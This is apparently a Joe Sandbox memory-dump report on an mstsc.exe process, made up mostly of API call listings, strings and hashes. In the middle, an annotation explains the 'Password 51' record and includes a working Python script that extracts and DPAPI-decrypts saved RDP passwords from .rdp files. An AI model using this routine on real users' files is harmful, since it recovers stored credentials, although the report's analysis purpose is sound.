                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e2b6a5db9a498d57cd4156e828ef327e0b8756c128383c06d6f832e4c83c1b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0831F271A04314AFCB20DF65CC58F667BA9BF49310F014099F954AB2A1DB71DE809B95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00965A19
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000208,0096A020), ref: 00965A82
                                                                                                                                                                                    • UnregisterClassW.USER32(?,00000000), ref: 00965A90
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00965A9A
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to get module specific class name, xrefs: 00965A5B
                                                                                                                                                                                    • PAL_SYS_WIN32_TIMER_WNDCLASS, xrefs: 00965A26
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$AddressClassErrorFreeLastLibraryMessageProcTraceUnregistermemset
                                                                                                                                                                                    • String ID: Failed to get module specific class name$PAL_SYS_WIN32_TIMER_WNDCLASS
                                                                                                                                                                                    • API String ID: 3271539793-2015629946
                                                                                                                                                                                    • Opcode ID: d07cffd6673780b1b4f775e15d7bf2d780f7ba8e425ce7d4c2348626f584bcc1
                                                                                                                                                                                    • Instruction ID: df34812a73776d3b4f8267cd32cf64dcb748aff68ef3b7135f29f3be3854b4f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: d07cffd6673780b1b4f775e15d7bf2d780f7ba8e425ce7d4c2348626f584bcc1
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3213B326083486FD725EFE09C99FAF3F9DAB45300F51059DF801AB192CA71CC40AB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00965B26
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000208,0096A020), ref: 00965B8F
                                                                                                                                                                                    • UnregisterClassW.USER32(?,00000000), ref: 00965B9D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00965BA7
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • PAL_SYS_WIN32_THREAD_WNDCLASS, xrefs: 00965B33
                                                                                                                                                                                    • Failed to get module specific class name, xrefs: 00965B68
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$AddressClassErrorFreeLastLibraryMessageProcTraceUnregistermemset
                                                                                                                                                                                    • String ID: Failed to get module specific class name$PAL_SYS_WIN32_THREAD_WNDCLASS
                                                                                                                                                                                    • API String ID: 3271539793-2016134723
                                                                                                                                                                                    • Opcode ID: 203783a7d1822a54bdf47829d99171677aa684636919e9cc284169a4d51849b9
                                                                                                                                                                                    • Instruction ID: ff696d54e6d1c6198bf49f9b8559394bec76938f1f9662b2100ba108dd259aac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 203783a7d1822a54bdf47829d99171677aa684636919e9cc284169a4d51849b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE210B72A083486FD725DF749C49FAA3799EB45310F15059DF901AB1D2CAB1DC809F91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003328,?,?,?,00936947,?,?,00936570,00003327,?,?,?,?,?), ref: 009369B5
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003330,?,?,?,?,00936454,00000110,?), ref: 009369C4
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332F,?,?,?,?,00936454,00000110,?), ref: 009369D8
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00003329,?,?,?,?,00936454,00000110,?), ref: 009369EC
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332A,?,?,?,?,00936454,00000110,?), ref: 009369FD
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332B,?,?,?,?,00936454,00000110,?), ref: 00936A0E
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000332C,?,?,?,?,00936454,00000110,?), ref: 00936A1F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonChecked
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1719414920-0
                                                                                                                                                                                    • Opcode ID: 3840a663c8d5bd2f1934fcfa909cf587a7c40439998e56de20e1321e15480a23
                                                                                                                                                                                    • Instruction ID: a6e5f46c0d78c5111413bb45e0f181513f3e1cc1bedaadaf301eca5bfb462ceb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3840a663c8d5bd2f1934fcfa909cf587a7c40439998e56de20e1321e15480a23
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6119032A40713B7EB265FA59C94B13AEADAF14754F218034F904F60E0DBA1DE619A94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 0094A325
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 0094A366
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0094A385
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0094A3AB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • mstsc.chm, xrefs: 0094A308
                                                                                                                                                                                    • CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32, xrefs: 0094A319
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                    • String ID: CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32$mstsc.chm
                                                                                                                                                                                    • API String ID: 1800380464-1505127495
                                                                                                                                                                                    • Opcode ID: 305a40ebb4acfab462967b8edd4244c3c5c8e0a88baf3463566cd3750ad97399
                                                                                                                                                                                    • Instruction ID: 4af20e9ee1d4c22b8e38f1c6b71e08bd0f5cfb7a38f02124f41ae03321af6b66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 305a40ebb4acfab462967b8edd4244c3c5c8e0a88baf3463566cd3750ad97399
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B2172B0A4421CEFDB219F60DC85FEB77BCEB55304F1002A9F845E2140EBB19E849A91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001397), ref: 0093A2E5
                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0093927F), ref: 0093A2EC
                                                                                                                                                                                    • SendMessageW.USER32(?,0000041E,00000000,00000000), ref: 0093A30D
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 0093A319
                                                                                                                                                                                    • CreateDialogIndirectParamW.USER32(00000110,?,?,?,?), ref: 0093A347
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0093A356
                                                                                                                                                                                    • SetFocus.USER32 ref: 0093A362
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendWindow$CreateDestroyDialogFocusIndirectItemParamShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 820276176-0
                                                                                                                                                                                    • Opcode ID: 1d71e4b972372193d96cd2adecd64cbe8ca544bb3fa57fc321234402ef96794f
                                                                                                                                                                                    • Instruction ID: 199d41a9c250d1a81a5d64672f152c7a0af9a8521e55f219807b47e63d00a809
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d71e4b972372193d96cd2adecd64cbe8ca544bb3fa57fc321234402ef96794f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2115772254700AFDB725B61EC09BA77AA5FB89B06F04881CF29A951B0CBB0A400EF05
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 0093B8CD
                                                                                                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0093B8DF
                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 0093B8E9
                                                                                                                                                                                    • UpdateColors.GDI32(00000000,?,00939186,?,?,?), ref: 0093B8F0
                                                                                                                                                                                    • UpdateWindow.USER32 ref: 0093B8F9
                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0093B90A
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0093B914
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Palette$SelectUpdate$ColorsRealizeReleaseWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1473888637-0
                                                                                                                                                                                    • Opcode ID: 18d9ef681cb386817389063d541295644e412d6ee3a0dbed96bb75bf91d72219
                                                                                                                                                                                    • Instruction ID: 5f9ba826448bbae325b6c59a069bd31dd8db14e2232efa94357e05e283eb3de2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18d9ef681cb386817389063d541295644e412d6ee3a0dbed96bb75bf91d72219
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB01D1B1529514BFC7115B61DD0CF6AFBACFF06315F014128F609C1020CBB1A911EFA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0094C46B: ??2@YAPAXI@Z.MSVCRT ref: 0094C474
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,0091396B,00000000,00000000,?,?,00901B90,?,00000400,?,?,?), ref: 009232F6
                                                                                                                                                                                    • memset.MSVCRT ref: 0092331E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$??2@AddressHandleLibraryLocalMessageModuleProcTracememset
                                                                                                                                                                                    • String ID: %s\%s$Addins$Default$Name
                                                                                                                                                                                    • API String ID: 1854944580-3070058336
                                                                                                                                                                                    • Opcode ID: e5513bd396d5c49bc752916f2943a33fb5b66ac360deae75187cf45f9061f297
                                                                                                                                                                                    • Instruction ID: b2d1dee77e68ce2d3ad7e64d0cef167a944addbd305a0f9f231f930e4eab051d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e5513bd396d5c49bc752916f2943a33fb5b66ac360deae75187cf45f9061f297
                                                                                                                                                                                    • Instruction Fuzzy Hash: F7C115727043546FDB29DF64EC55FA677BAAB49300F1480D8E500AB1AADA79CF809F41
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 009533E0
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000800), ref: 00953424
                                                                                                                                                                                    • memset.MSVCRT ref: 0095347D
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • memset.MSVCRT ref: 00953492
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,-00000001), ref: 009535E1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Local$ActivityAllocControlEventFreeMessageTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 432507534-0
                                                                                                                                                                                    • Opcode ID: c4432918c4683276b64242ac5770647f0d0b16e4e7f5343aafc829b6627e8214
                                                                                                                                                                                    • Instruction ID: 780168a170578f9693b80230b9d847b79b92c9e1438c40f3dc60a288db9b9f95
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4432918c4683276b64242ac5770647f0d0b16e4e7f5343aafc829b6627e8214
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B6135715003049ADB36CF65CC89B6A37ADEB49380F048099FD0997262D671CF89EF61
APIs
  • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
• LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,00000000,?,?), ref: 0094FD7D
• LocalFree.KERNEL32(00000000), ref: 0094FE27
  • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Local$ActivityAllocControlEventFree_vsnwprintf
• String ID: %s\%s$Memory allocation failed$Servers$StringCchPrintf failed
• API String ID: 3268872356-1330720887
• Opcode ID: 973ca5aa19e5da419b8faa6b05308025b2a81a78492699c92efe4e8a4f7d2de0
• Instruction ID: bab6ee15481c0a2857a95b691e66dc98e7e2804b6000b88b12ff7119bb007bee
• Opcode Fuzzy Hash: 973ca5aa19e5da419b8faa6b05308025b2a81a78492699c92efe4e8a4f7d2de0
• Instruction Fuzzy Hash: DD41F832B043466FDB169F94D869F2B7BAAEB89305F160068F500AB1F3DBB1CD409B51
APIs
  • Part of subcall function 00943390: LocalFree.KERNEL32(?,?,00913402,00000001,00901B90,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0094339C
• memset.MSVCRT ref: 0092E4EC
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0092E52D
  • Part of subcall function 0094BFCD: LoadLibraryW.KERNEL32(crypt32.dll,00000000,00000000,00000200,0092E57B), ref: 0094BFFE
  • Part of subcall function 0094BFCD: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0094C014
  • Part of subcall function 0094BFCD: GetLastError.KERNEL32 ref: 0094C034
  • Part of subcall function 0094BFCD: FreeLibrary.KERNEL32(00000000), ref: 0094C0B9
• memcpy.MSVCRT(?,00000000,?), ref: 0092E599
• LocalFree.KERNEL32(00000000), ref: 0092E5D0
• LocalFree.KERNEL32(00000000), ref: 0092E624
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: FreeLocal$Library$AddressAllocErrorLastLoadProcmemcpymemset
• String ID: Password 51
• API String ID: 2249177944-3933498968
• Opcode ID: 12ec4da81bcffd7c2820f608d61fdcca50e90f098187a913a0a974ced5ff72d2
• Instruction ID: 2227f4dfd07824bc77f7b04cd5e251b42b74559f7c4acc0e2ebe821cdada2649
• Opcode Fuzzy Hash: 12ec4da81bcffd7c2820f608d61fdcca50e90f098187a913a0a974ced5ff72d2
• Instruction Fuzzy Hash: B5418070A0122D9FDB20AB64EC98BE9B7B9EF94304F100195F805A7251DB709E81CF91
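The record above (LoadLibraryW of crypt32.dll, GetProcAddress of CryptUnprotectData, a LocalAlloc/memcpy/LocalFree sequence and the string "Password 51") is consistent with the host process's own credential handling rather than the payload's: the dump is the mstsc.exe image (snapshot hcaresult_10_2_900000_mstsc.jbxd), and "password 51:b:<hex>" is the field in which mstsc keeps an .rdp file's password as a DPAPI blob that it decrypts with CryptUnprotectData and releases with LocalFree. When triaging a hollowed process it is worth separating this from the injected code instead of reading the CryptUnprotectData reference as credential theft. The Python below is an added example, not code from the report, from Joe Sandbox or from mstsc; the helper names are the example's own, the .rdp content and blob body are constructed, and it assumes (as mstsc does) no optional entropy and a UTF-16LE plaintext inside the blob.

```python
"""Parse the 'password 51' field of an .rdp file and decrypt it via DPAPI.

Added example; helper names are this example's own, not mstsc's or the report's.
"""
import binascii
import ctypes
import sys

# Every DPAPI blob starts with dwVersion == 1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in its little-endian on-disk layout.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def parse_rdp(text):
    """Parse 'key:type:value' lines into {key: (type, value)}.

    Types are s (string), i (integer) and b (binary, hex encoded). Keys may
    contain spaces ('full address', 'password 51'), so split on at most two colons.
    """
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) != 3 or parts[1] not in ("s", "i", "b"):
            continue  # blank line, comment or malformed entry
        key, typ, value = parts
        settings[key.lower()] = (typ, value)
    return settings


def extract_password51(text):
    """Return the raw DPAPI blob from 'password 51:b:<hex>', or None if absent/invalid."""
    entry = parse_rdp(text).get("password 51")
    if entry is None or entry[0] != "b":
        return None
    try:
        return binascii.unhexlify(entry[1])
    except (binascii.Error, ValueError):
        return None


def is_dpapi_blob(blob):
    """Cheap header check before handing bytes to CryptUnprotectData."""
    return len(blob) > len(DPAPI_BLOB_MAGIC) and blob.startswith(DPAPI_BLOB_MAGIC)


class _DataBlob(ctypes.Structure):
    # DATA_BLOB: {DWORD cbData; BYTE *pbData;}
    _fields_ = [("cbData", ctypes.c_uint32),
                ("pbData", ctypes.POINTER(ctypes.c_char))]


def dpapi_unprotect(blob):
    """crypt32!CryptUnprotectData with no optional entropy, as mstsc uses it.

    Windows only, and it only succeeds in the security context whose master key
    protected the blob. The output buffer is LocalAlloc'd by the API, hence LocalFree.
    """
    if not sys.platform.startswith("win"):
        raise OSError("DPAPI is only available on Windows")
    if not is_dpapi_blob(blob):
        raise ValueError("not a DPAPI blob")
    crypt32 = ctypes.WinDLL("crypt32")
    kernel32 = ctypes.WinDLL("kernel32")
    buf = ctypes.create_string_buffer(blob, len(blob))
    data_in = _DataBlob(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    data_out = _DataBlob()
    ok = crypt32.CryptUnprotectData(ctypes.byref(data_in), None, None, None, None, 0,
                                    ctypes.byref(data_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(data_out.pbData, data_out.cbData)
    finally:
        kernel32.LocalFree(data_out.pbData)


def decode_password(plaintext):
    """mstsc stores the password inside the blob as a UTF-16LE string (assumption stated above)."""
    return plaintext.decode("utf-16-le").rstrip("\x00")


def recover_rdp_password(text):
    """End-to-end: .rdp text -> cleartext password, or None if the field is missing."""
    blob = extract_password51(text)
    if blob is None or not is_dpapi_blob(blob):
        return None
    return decode_password(dpapi_unprotect(blob))


# Constructed sample, not taken from the analysed document: a valid DPAPI
# header with a dummy body, enough to exercise parsing and the header check offline.
SAMPLE_BLOB = DPAPI_BLOB_MAGIC + bytes(range(44))
SAMPLE_RDP = (
    "full address:s:rdp.example.internal:3389\r\n"
    "username:s:CORP\\analyst\r\n"
    "password 51:b:" + SAMPLE_BLOB.hex().upper() + "\r\n"
    "prompt for credentials:i:0\r\n"
)

if __name__ == "__main__":
    print(parse_rdp(SAMPLE_RDP)["full address"])
    print("looks like DPAPI:", is_dpapi_blob(extract_password51(SAMPLE_RDP)))
```

Run recover_rdp_password on a real .rdp file only as the Windows user who saved it: the blob is bound to that user's DPAPI master key, so the same bytes fail with an access error under any other account, and offline recovery needs that master key rather than this call. The header check is what lets an analyst tell a genuine "password 51" blob from arbitrary hex in a file without touching DPAPI at all.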
APIs
• LoadCursorW.USER32 ref: 00918D47
• SetCursor.USER32(00000000), ref: 00918D4E
• ??2@YAPAXI@Z.MSVCRT ref: 00918D75
• ShowWindow.USER32(00000000,00000009), ref: 00918DBD
• ShowWindow.USER32(?,00000009), ref: 00918DCA
• SetForegroundWindow.USER32(?), ref: 00918DD3
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Window$CursorShow$??2@AddressForegroundFreeHandleLibraryLoadMessageModuleProcTrace
• String ID:
• API String ID: 1895109922-0
• Opcode ID: 555439134a615336bb55a494cc72a8aad99635fc3ef991f75d0e36fde09ba422
• Instruction ID: 5305cfc2ea85ec9c06f5cc950e43aa64975701502160d466bba13e12d4475689
• Opcode Fuzzy Hash: 555439134a615336bb55a494cc72a8aad99635fc3ef991f75d0e36fde09ba422
• Instruction Fuzzy Hash: 1941A279704704AFDB259F65EC18BA37BEAAF98300F20091DF586861E1CF71D881EB51
APIs
• ??_U@YAPAXI@Z.MSVCRT(00000000,00000000,00000022,00003AB3), ref: 009112EE
• ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 00911317
• memcpy_s.MSVCRT ref: 00911334
• memcpy_s.MSVCRT ref: 00911348
• ??_V@YAXPAX@Z.MSVCRT(00000000,Module), ref: 0091137B
• ??_V@YAXPAX@Z.MSVCRT(00000000), ref: 0091137E
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: 37a55fb0aa19c2727b4b785de9f89438f89c86f577e5a04c8edf98c1b110eccc
• Instruction ID: a38e08778528605bb78058bb05c8fca4947175da84227b662ca06cc6510976f3
• Opcode Fuzzy Hash: 37a55fb0aa19c2727b4b785de9f89438f89c86f577e5a04c8edf98c1b110eccc
• Instruction Fuzzy Hash: 50310872B0011D7BDB14DF6CDC85AFEB7ADEB84310F04822AFA15D7244DA749A418B94
APIs
• CheckRadioButton.USER32(?,000033B8,000033BA,000033B8), ref: 0093FA72
• CheckRadioButton.USER32(?,000033BD,000033BE,?), ref: 0093FA88
• GetDlgItem.USER32(?,000033BD), ref: 0093FA9E
• EnableWindow.USER32(00000000), ref: 0093FAA7
• GetDlgItem.USER32(?,000033BE), ref: 0093FAB3
• EnableWindow.USER32(00000000), ref: 0093FAB6
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ButtonCheckEnableItemRadioWindow$AddressFreeHandleLibraryMessageModuleProcTrace
• String ID:
• API String ID: 3061383565-0
• Opcode ID: 410de0c0cb818a16d07cfce0efbc00f33df2fcc653c7711b90ebb775d4bb7955
• Instruction ID: 995dcfa5ff7ac2c01a66a0e76755b3af7e83cb5055026a7eb4083307fca1ccfb
• Opcode Fuzzy Hash: 410de0c0cb818a16d07cfce0efbc00f33df2fcc653c7711b90ebb775d4bb7955
• Instruction Fuzzy Hash: 76313832E043086FDB219B54DC58F66BBDEEB44350F150075F908DB2A1DA75DD81AF90
APIs
• CheckDlgButton.USER32(?,00003328,?), ref: 009368C8
• CheckDlgButton.USER32(?,00003330,?), ref: 009368DB
• CheckDlgButton.USER32(?,0000332F,?), ref: 009368EE
• CheckDlgButton.USER32(?,00003329,?), ref: 00936902
• CheckDlgButton.USER32(?,0000332A,?), ref: 00936917
• CheckDlgButton.USER32(?,0000332B,?), ref: 0093692A
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
